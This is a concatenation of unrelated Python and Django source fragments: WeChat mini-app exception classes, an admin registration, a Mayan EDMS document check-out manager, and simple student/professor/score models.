def __init__(self, message, status_code=None, payload=None):
super().__init__()
self.message = message
self.status_code = status_code or self.__class__.status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['errmsg'] = self.message
return rv
class RequestArgumentError(PKUYouthException):
""" 请求参数错误 """
class WxbotAuthFailed(PKUYouthException):
""" 微信服务器接入认证失败 """
class MiniappGetAccessTokenFailed(PKUYouthException):
""" 获取微信 API 访问凭证失败 """
class MiniappJscode2sessionFailed(PKUYouthException):
""" 未能成功通过微信服务器与小程序用户建立会话 """
class MiniappUnauthorized(PKUYouthException):
""" 小程序用户认证失败 """
status_code = 401
|
from django.contrib import admin
from expiring_links.models import ExpiringLink
admin.site.register(ExpiringLink)
|
from __future__ import absolute_import, unicode_literals
import logging
from django.apps import apps
from django.db import models, transaction
from django.utils.timezone import now
from mayan.apps.documents.models import Document
from .events import (
event_document_auto_check_in, event_document_check_in,
event_document_forceful_check_in
)
from .exceptions import DocumentNotCheckedOut
from .literals import STATE_CHECKED_OUT, STATE_CHECKED_IN
logger = logging.getLogger(__name__)
class DocumentCheckoutManager(models.Manager):
def are_document_new_versions_allowed(self, document, user=None):
try:
check_out_info = self.document_check_out_info(document=document)
except DocumentNotCheckedOut:
return True
else:
return not check_out_info.block_new_version
def check_in_document(self, document, user=None):
try:
document_check_out = self.model.objects.get(document=document)
except self.model.DoesNotExist:
raise DocumentNotCheckedOut
else:
with transaction.atomic():
if user:
if self.get_check_out_info(document=document).user != user:
event_document_forceful_check_in.commit(
actor=user, target=document
)
else:
event_document_check_in.commit(actor=user, target=document)
else:
event_document_auto_check_in.commit(target=document)
document_check_out.delete()
def check_in_expired_check_outs(self):
for document in self.expired_check_outs():
document.check_in()
def check_out_document(self, document, expiration_datetime, user, block_new_version=True):
return self.create(
block_new_version=block_new_version, document=document,
expiration_datetime=expiration_datetime, user=user
)
def checked_out_documents(self):
return Document.objects.filter(
pk__in=self.model.objects.values('document__id')
)
def get_check_out_info(self, document):
try:
return self.model.objects.get(document=document)
except self.model.DoesNotExist:
raise DocumentNotCheckedOut
def get_check_out_state(self, document):
if self.is_checked_out(document=document):
return STATE_CHECKED_OUT
else:
return STATE_CHECKED_IN
def expired_check_outs(self):
expired_list = Document.objects.filter(
pk__in=self.model.objects.filter(
expiration_datetime__lte=now()
).values_list('document__pk', flat=True)
)
logger.debug('expired_list: %s', expired_list)
return expired_list
def get_by_natural_key(self, document_natural_key):
Document = apps.get_model(
app_label='documents', model_name='Document'
)
try:
document = Document.objects.get_by_natural_key(document_natural_key)
except Document.DoesNotExist:
raise self.model.DoesNotExist
return self.get(document__pk=document.pk)
def is_checked_out(self, document):
return self.filter(document=document).exists()
class NewVersionBlockManager(models.Manager):
def block(self, document):
self.get_or_create(document=document)
def is_blocked(self, document):
return self.filter(document=document).exists()
def get_by_natural_key(self, document_natural_key):
Document = apps.get_model(
app_label='documents', model_name='Document'
)
try:
document = Document.objects.get_by_natural_key(document_natural_key)
except Document.DoesNotExist:
raise self.model.DoesNotExist
return self.get(document__pk=document.pk)
def unblock(self, document):
self.filter(document=document).delete()
|
from django.db import models
# Create your models here.
class Student(models.Model):
id = models.IntegerField(primary_key=True)
name = models.CharField(max_length=100)
class Professor(models.Model):
id = models.IntegerField(primary_key=True)
name = models.CharField(max_length=100)
class Score(models.Model):
id = models.IntegerField(primary_key=True)
name = models.CharField(max_length=100)
professor = models.ForeignKey(Professor, on_delete=models.CASCADE)
student = models.ForeignKey(Student, on_delete=models.CASCADE)
value = models.DecimalField(max_digits=4, decimal_places=2)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.